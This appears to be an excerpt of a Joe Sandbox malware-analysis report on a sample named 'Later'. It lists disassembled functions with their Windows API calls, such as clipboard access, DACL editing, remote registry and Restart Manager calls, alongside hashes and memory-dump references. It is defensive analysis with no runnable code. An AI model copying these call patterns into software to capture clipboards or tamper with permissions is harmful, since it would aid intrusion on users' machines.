Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 529ba8e52c7c8070ba7c3c122a5e0d6281a8bc61576ea112357d59366fa305a5
Instruction ID: f0580bb2cb31ccbc397bd65c1af22c26232510bb66bb01c41f84e6d731de127b
Opcode Fuzzy Hash: 529ba8e52c7c8070ba7c3c122a5e0d6281a8bc61576ea112357d59366fa305a5
Instruction Fuzzy Hash: C8E08C72504208ABCB322FE9A80CB8A3E98AB01A56F114426FA0CAE160DA348584D7A0

Function 014C2460 Relevance: 1.8, APIs: 1, Instructions: 262COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 014C2726

Part of subcall function 01401BC0: ___std_exception_copy.LIBVCRUNTIME ref: 01401BFE

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task___std_exception_copy
String ID:
API String ID: 1979911387-0
Opcode ID: 66fd8227a7661fb279d72f10298ff5d0bab8adc3cac2f27b43bea2c805f25fdd
Instruction ID: 9cd83263b7c32509668646cceef9adedfe6039cbb46277ff5edbee4a50db43bd
Opcode Fuzzy Hash: 66fd8227a7661fb279d72f10298ff5d0bab8adc3cac2f27b43bea2c805f25fdd
Instruction Fuzzy Hash: 92A17C75E002159FDB15CF68C894BAEFBF1EF58710F18816EE409AB3A1D7B1A941CB90

Function 0142CEA0 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0142D07E

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 0e9236ad869117fb4399ad9779e1ef7056e19254a9cea46ed91a6b72828b230a
Instruction ID: c1a1b8ebea1f9da332c824173befe4018ab03c5afd05f8211cd079ca961ca52c
Opcode Fuzzy Hash: 0e9236ad869117fb4399ad9779e1ef7056e19254a9cea46ed91a6b72828b230a
Instruction Fuzzy Hash: 5251D3B2E0011AAFCF10DFB9CD949AEBBB6EF94254B24416BE514E7360D6319D41CB90

Function 01410490 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RmStartSession.RSTRTMGR(?,00000000,?,00000000), ref: 014104EC

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: SessionStart
String ID:
API String ID: 3722301762-0
Opcode ID: 86e285646d706ef4bb86dddba4a7d7e7f6b10f4581da2d08fe6ea1f7f0385c77
Instruction ID: 31cf97e2e06ed4c596d9aac33b6d130ff722489bd265e0350f57566e4f724f6e
Opcode Fuzzy Hash: 86e285646d706ef4bb86dddba4a7d7e7f6b10f4581da2d08fe6ea1f7f0385c77
Instruction Fuzzy Hash: 0B212731A0020D9FEB24CF68DD94BEE7BA4EB55310F60851EF918DB285DB3499C4CB81

Function 01432360 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 014323D0

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: c4b666a4a07afccc49991087d7e35fda107ad4c35b67fdf497f86c59ff2c90db
Instruction ID: e0aad056ec3e16d93769a44008112a7445b2125a599d37992b159ca1e95d6690
Opcode Fuzzy Hash: c4b666a4a07afccc49991087d7e35fda107ad4c35b67fdf497f86c59ff2c90db
Instruction Fuzzy Hash: BA0152B26016175FD300DFA9E81099AF7D8EFA8661714813BD518C3710E3B4E46187D1

Function 014ED212 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,014DA246,?,?,?,?,?,01401AF7,?,?,?), ref: 014ED244

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a950422095fa3c96dda88b1f6d67e0d8a548af3fdd47679dddee1785eb834fe8
Instruction ID: fdc0a64f3b91ca4d3c564bb19e3cf503406ca9be3eebf92adc78cac7bce5790b
Opcode Fuzzy Hash: a950422095fa3c96dda88b1f6d67e0d8a548af3fdd47679dddee1785eb834fe8
Instruction Fuzzy Hash: A1E06C31D0511257EA311BE99D0CF5B3AC89F53273F050113ED149A1B1DB31D80181E6

Function 014C575A Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 014C5761

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 282a74a3296d818f1f302ff09088b1aa8004cf1ca3d25aeb4486e60c617e478d
Instruction ID: fbeefc16603843c6c6b58d78997026db846cab79aa0a645490426d28db45d3f1
Opcode Fuzzy Hash: 282a74a3296d818f1f302ff09088b1aa8004cf1ca3d25aeb4486e60c617e478d
Instruction Fuzzy Hash: 5AE01A7910160AABEF11DF54C945BAF3BB0FB15654F08800AEE146F2A0C634AA50CBA1

Function 0141FB10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_vcomp_fork.VCOMP140(00000001,00000002,014FB9E0,00000004,?,?,invalid stoi argument,stoi argument out of range), ref: 0141FB1D

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: _vcomp_fork
String ID:
API String ID: 3592199487-0
Opcode ID: 151f88b48800b8b3c819145fb7d43616a6b2d90bd8bd07150cede770dcfd2c41
Instruction ID: cf1285cbc64916c1303d606b7fe678ca100ef1ec61d77d9d16d90b792a1fbd70
Opcode Fuzzy Hash: 151f88b48800b8b3c819145fb7d43616a6b2d90bd8bd07150cede770dcfd2c41
Instruction Fuzzy Hash: 9EB012E17D030439F01C22018C0BF5710048320F10F64018E73062D2D278E12C500075

Non-executed Functions

Function 00C64416 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C80980), ref: 00C64440
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6444E
GetClipboardData.USER32(0000000D), ref: 00C64456
CloseClipboard.USER32 ref: 00C64462
GlobalLock.KERNEL32(00000000), ref: 00C6447E
CloseClipboard.USER32 ref: 00C64488
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C6449D
IsClipboardFormatAvailable.USER32(00000001), ref: 00C644AA
GetClipboardData.USER32(00000001), ref: 00C644B2
GlobalLock.KERNEL32(00000000), ref: 00C644BF
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C644F3
CloseClipboard.USER32 ref: 00C64603

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 4f8d1ddf4130672f7b083727e20b84a432220b6f90b779331c39e27b348977f9
Instruction ID: bc7403b0e1f71c5610c7a129784d7b9e530bde12a3dc932f09590f9773768f34
Opcode Fuzzy Hash: 4f8d1ddf4130672f7b083727e20b84a432220b6f90b779331c39e27b348977f9
Instruction Fuzzy Hash: 0A51C171244201AFD354EF60DC8AF7E77A8AF84B51F100529F956D21E2EF70DA08DB66

Function 00C5E0CA Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C5E18C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C5E19C
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C5E1A8
__wsplitpath.LIBCMT ref: 00C5E206
_wcscat.LIBCMT ref: 00C5E21E
_wcscat.LIBCMT ref: 00C5E230
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5E245
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E259
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E28B
SetCurrentDirectoryW.KERNEL32(?), ref: 00C5E2AC
_wcscpy.LIBCMT ref: 00C5E2B8
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C5E2F7

Strings

*.*, xrefs: 00C5E2B2

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2ecff32e5e82d0c8bf1760dfb275278183d2ac2767ffdf75152a380cea11f81a
Instruction ID: 929ded5e5c03ec32394b6b472336d1d411d3ac69c9ed2690de2ea5f8e3579703
Opcode Fuzzy Hash: 2ecff32e5e82d0c8bf1760dfb275278183d2ac2767ffdf75152a380cea11f81a
Instruction Fuzzy Hash: 98618B765047059FC714EF60C885AAFB3E8FF89310F04491DF99987251DB31EA89CB96

Function 00C486B0 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48C1F
Part of subcall function 00C48C03: GetLastError.KERNEL32(?,00C486E3,?,?,?), ref: 00C48C29
Part of subcall function 00C48C03: GetProcessHeap.KERNEL32(00000008,?,?,00C486E3,?,?,?), ref: 00C48C38
Part of subcall function 00C48C03: HeapAlloc.KERNEL32(00000000,?,00C486E3,?,?,?), ref: 00C48C3F
Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48C56

Part of subcall function 00C48CA0: GetProcessHeap.KERNEL32(00000008,00C486F9,00000000,00000000,?,00C486F9,?), ref: 00C48CAC
Part of subcall function 00C48CA0: HeapAlloc.KERNEL32(00000000,?,00C486F9,?), ref: 00C48CB3
Part of subcall function 00C48CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C486F9,?), ref: 00C48CC4

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48714
_memset.LIBCMT ref: 00C48729
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48748
GetLengthSid.ADVAPI32(?), ref: 00C48759
GetAce.ADVAPI32(?,00000000,?), ref: 00C48796
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C487B2
GetLengthSid.ADVAPI32(?), ref: 00C487CF
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C487DE
HeapAlloc.KERNEL32(00000000), ref: 00C487E5
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48806
CopySid.ADVAPI32(00000000), ref: 00C4880D
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C4883E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48864
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48878

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
Instruction ID: 9210b84e1b0182f219caba6aa7880aece591d9d16e0425c1a1e9289760258c71
Opcode Fuzzy Hash: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
Instruction Fuzzy Hash: AA613672900209AFDF44DFA4DC84BAEBB79FF04314F548129F825A7290DB359A09DB64

Function 00C70802 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C708D4

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C70973
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C70A0B
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C70C4A
RegCloseKey.ADVAPI32(00000000), ref: 00C70C57

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 6e91e0f0f6b2d686c7d097c055ca8822142ba118ff0275073f39fd59fcf4e0a8
Instruction ID: cfcb01db3dc28de7dc22b5cd1bd54bb76b1fea07e779702c7310848bda524f64
Opcode Fuzzy Hash: 6e91e0f0f6b2d686c7d097c055ca8822142ba118ff0275073f39fd59fcf4e0a8
Instruction Fuzzy Hash: 73E13A31204214EFCB15DF29C891E2ABBE4EF89314F14856DF95ADB2A2DB30ED05DB52

Function 00C542AA Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C542BE
__swprintf.LIBCMT ref: 00C542CB

Part of subcall function 00C137FA: __woutput_l.LIBCMT ref: 00C13853

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C542F5
LoadResource.KERNEL32(?,00000000), ref: 00C54301
LockResource.KERNEL32(00000000), ref: 00C5430E
FindResourceW.KERNEL32(?,?,00000003), ref: 00C5432E
LoadResource.KERNEL32(?,00000000), ref: 00C54340
SizeofResource.KERNEL32(?,00000000), ref: 00C5434F
LockResource.KERNEL32(?), ref: 00C5435B
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 00C543BC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 5d2e16c9be7bf903b5f70af402ddc3cdd97ed6f004c073dc27b68fe0249dd58c
Instruction ID: 6da7958b4184a1e37e2047c1e2eccc500fe3d4288ec5be9f73c49ad78086fb78
Opcode Fuzzy Hash: 5d2e16c9be7bf903b5f70af402ddc3cdd97ed6f004c073dc27b68fe0249dd58c
Instruction Fuzzy Hash: 1E31C07550021AABCB189F61DD48BBF7BACEF04306F104519FD16D2160D770DA99DBA8

Function 00C64614 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C6463B
EmptyClipboard.USER32 ref: 00C64641
GlobalAlloc.KERNEL32(00000002,?), ref: 00C64656
CloseClipboard.USER32 ref: 00C646F5

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: fbe5df9f41cf4526f57587c0b673bfcb70e6f80bc3b216fb2b3b2ce469195585
Instruction ID: af83afb3ab6c060297671d7f5f25fae20416c58415490ebb0469b2214a7b59de
Opcode Fuzzy Hash: fbe5df9f41cf4526f57587c0b673bfcb70e6f80bc3b216fb2b3b2ce469195585
Instruction Fuzzy Hash: 0E2103353012109FEB15AF60EC49B2E77A8FF45721F118019F9069B2A2DB70ED05CB99

Function 014F4DA9 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

GetACP.KERNEL32(?,?,?,?,?,?,014EA7CC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 014F4E68
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,014EA7CC,?,?,?,00000055,?,-00000050,?,?), ref: 014F4E9F
_wcschr.LIBVCRUNTIME ref: 014F4F33
_wcschr.LIBVCRUNTIME ref: 014F4F41
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 014F5002

Strings

utf8, xrefs: 014F4F71

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: a9cc1393d1c8f005b5f321a6b076329583d210dbfbe10df104bba9a2231008be
Instruction ID: 6ae2c2616b35f223175fe260672297520e910a773dc2dff89171f4bbb8c5f1f9
Opcode Fuzzy Hash: a9cc1393d1c8f005b5f321a6b076329583d210dbfbe10df104bba9a2231008be
Instruction Fuzzy Hash: B371E671A04203AAEB25AF79CC55A7777A8EF24710F08442FE719DB3A0EF74E44187A1

Function 014F5542 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,014F5854,00000002,00000000,?,?,?,014F5854,?,00000000), ref: 014F55DB
GetLocaleInfoW.KERNEL32(?,20001004,014F5854,00000002,00000000,?,?,?,014F5854,?,00000000), ref: 014F5604
GetACP.KERNEL32(?,?,014F5854,?,00000000), ref: 014F5619

Strings

ACP, xrefs: 014F5560
OCP, xrefs: 014F5596

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b94977d5ef5e26b025ceea43b42dc59b7704fd5c096fe810675cf7e11c622566
Instruction ID: 9cf879c22fa96dd32e94cc4f96dc73981d881c847cc3ff9f5c88d33dd4019304
Opcode Fuzzy Hash: b94977d5ef5e26b025ceea43b42dc59b7704fd5c096fe810675cf7e11c622566
Instruction Fuzzy Hash: E421A731600101ABEB369F6DD908A97B7E7BB44E54B46446EE71ECF329E731D941C390

Function 014F571E Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 014F5826
IsValidCodePage.KERNEL32(00000000), ref: 014F5864
IsValidLocale.KERNEL32(?,00000001), ref: 014F5877
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 014F58BF
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 014F58DA

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 5063aa6b2c12f41386cfd956d2b3eb71cc1eef4e955260e56abbcff20bfa0e33
Instruction ID: 1924a4839d42eb120beb8dd4599320497f5158157e5e857e09e3c6722df79512
Opcode Fuzzy Hash: 5063aa6b2c12f41386cfd956d2b3eb71cc1eef4e955260e56abbcff20bfa0e33
Instruction Fuzzy Hash: 40514071A01216AEEB21DFA9CC44AAB77F8FF18700F05446EA711EF360E7709544CBA1

Function 00C5C16C Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C5C196
_wcscmp.LIBCMT ref: 00C5C1C6
_wcscmp.LIBCMT ref: 00C5C1DB
FindNextFileW.KERNEL32(00000000,?), ref: 00C5C1EC
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C5C21C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 603a26767a99b4bbbaad715a617ed4b020451f2995190461017db297b7da74fb
Instruction ID: 0d6bede96fa988e97a6fb31a2a703c92cad700f60cbb0a029d46bd4d64032803
Opcode Fuzzy Hash: 603a26767a99b4bbbaad715a617ed4b020451f2995190461017db297b7da74fb
Instruction Fuzzy Hash: 8251BC396047028FD714DFA8D8C0AAAB3E4FF4A324F10465DF966873A1DB30AD48CB95

Function 014E0F90 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfc7e667b38ebe1e3c454dd6cc6b6134ae81f308a9512fda05ed4d65119c9fa
Instruction ID: 1d8d99256842aa95ac2d5e8ed1275c4d58e2f06d77aa283583eddbca3b855685
Opcode Fuzzy Hash: 0dfc7e667b38ebe1e3c454dd6cc6b6134ae81f308a9512fda05ed4d65119c9fa
Instruction Fuzzy Hash: 2D025C71E002199BDF14CFA9C984AAEFBF1FF48715F24826AD519E7391D731AA01CB90

Function 014D95AC Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 014D95B8
IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 014D9683
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 014D96A3
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 014D96AD

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8dfcd2d23a2cf9848bd8d9d1a09b3708e5a7b938ee96be23cf34f0210e6c5cbe
Instruction ID: 2475fe7e2e890a4091a9d3896e716d29df5d40ac983a4516574410a9f1d6b399
Opcode Fuzzy Hash: 8dfcd2d23a2cf9848bd8d9d1a09b3708e5a7b938ee96be23cf34f0210e6c5cbe
Instruction Fuzzy Hash: 94312975D0121D9BDF21DFA5D999BCDBBF8BF18304F1040AAE50CAB250EB719A858F44

